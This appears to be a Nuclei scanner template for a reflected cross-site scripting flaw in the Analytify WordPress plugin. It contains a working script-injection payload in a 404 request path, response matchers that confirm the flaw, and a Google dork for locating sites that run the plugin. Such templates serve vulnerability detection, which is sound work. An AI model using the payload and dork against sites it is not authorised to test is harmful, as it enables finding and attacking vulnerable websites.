38 lines
968 B
YAML
38 lines
968 B
YAML
id: analytify-plugin-xss
|
|
|
|
info:
|
|
name: Analytify < 4.2.1 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
The plugin does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to Reflected Cross-Site Scripting.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
|
|
metadata:
|
|
verified: true
|
|
google-dork: inurl:/wp-content/plugins/wp-analytify
|
|
tags: wp-plugin,xss,wp,wordpress,analytify
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/aa404bb?a</script><script>alert(/XSS/)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'text/javascript">alert(/XSS/)</script>'
|
|
- 'wp-analytify'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 404
|